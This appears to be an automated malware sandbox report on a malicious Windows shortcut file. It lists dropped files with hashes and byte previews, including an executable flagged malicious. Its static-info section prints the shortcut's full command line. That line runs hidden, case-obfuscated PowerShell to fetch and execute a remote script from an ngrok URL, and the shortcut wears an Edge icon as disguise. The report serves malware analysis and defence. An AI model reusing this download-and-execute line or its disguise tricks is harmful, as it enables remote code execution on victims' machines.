                                                                                                                                                                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_2079861203\187c56da-8fec-41b0-b99c-7b907475015f.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_2079861203\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                              MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_2079861203\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_2079861203\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10388
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_2079861203\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                              SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\111392827.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):979567347
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.03081039114816888
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                                                              MD5:3630E7B5DBB0E1C85EB706E03083DCCD
                                                                                                                                                                                                                                                                                              SHA1:359B68BAC271E72B8A1049B03EFF8F0D99001446
                                                                                                                                                                                                                                                                                              SHA-256:3A101A1B1DCDAB3321FA1157C86B3A418965F542051FF70AF24FA0B9B4CA9D85
                                                                                                                                                                                                                                                                                              SHA-512:8A86B5C5464F84701C4D069312F352E08822B7E397F09ECEA473E7EE1C5C88C98035B92E9977F9A5EE9C436E375876D6D8E5EA8AD47ED761602EAADF5E24AAA1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0......1......3......*....].3....^.=....H.%....O.?....X.'..0.......A......_.1....Z.1..Rich0..................PE..L......e.....................v.......4............@..........................P.......f....@..................................+..........$................S...p.........................................@...............p............................text............................... ..`.rdata..............................@..@.data....0...`.......H..............@....rsrc...$............d..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\Downloads\590164a5-f85d-4694-a2fe-97d4fd972cc3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):106848
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                              MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                              SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                              SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                              SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                              C:\Users\user\Downloads\Lewis Silkin LLP.pdf (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):106848
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                              MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                              SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                              SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                              SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                              C:\Users\user\Downloads\Unconfirmed 602590.crdownload (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):106848
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                              MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                              SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                              SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                              SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.42245191354637
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:svloTyW+EZMM6DFym03w
                                                                                                                                                                                                                                                                                              MD5:0CE657E3E0A2B67FFF10ED7EBAE0D47C
                                                                                                                                                                                                                                                                                              SHA1:B9B092B44558A9687736AE39B8018EA342B569B1
                                                                                                                                                                                                                                                                                              SHA-256:0A55D7B35710AB5A5994A882FCA522B54838198E32165E8FBA5A92375D86AA35
                                                                                                                                                                                                                                                                                              SHA-512:1E1D6F937E8D6C2C0E089576B29E9118B94697EF2797D347A1725041F5C638C7E034F7A0B1412E8962C74E402776F228B66F168602F5BCC4763E1D355C05F601
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.6.*K..............................................................................................................................................................................................................................................................................................................................................j..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7254621032874655
                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                                              File name:qxjDerXRGR.lnk
                                                                                                                                                                                                                                                                                              File size:2'614 bytes
                                                                                                                                                                                                                                                                                              MD5:c88f33a90353512ebf86cb42e9e1ed08
                                                                                                                                                                                                                                                                                              SHA1:a99182cf7c27dda2a192598210339eb96f0612a6
                                                                                                                                                                                                                                                                                              SHA256:72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269
                                                                                                                                                                                                                                                                                              SHA512:edb2dd3a7c3776fa0b10e8462afc6dd8e86665d903bf884add622f2687d61ebc1ca9306bd11a49295b9d80b53866c0c2f592924fc6dfdc3431f9a7b6c8cb44ed
                                                                                                                                                                                                                                                                                              SSDEEP:48:8GIgax4PsU/uPpCLOrPGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2uPgO7dl2uWvZg5Y
                                                                                                                                                                                                                                                                                              TLSH:1B51DD252ED51739F3B34E368AB7A2519E7ABD46AD224F2E004042880C62B15DC76F2B
                                                                                                                                                                                                                                                                                              File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

                                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                                              Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                                                                              Static Windows Shortcut Info

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                                                                                                                                                                                                                                                                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
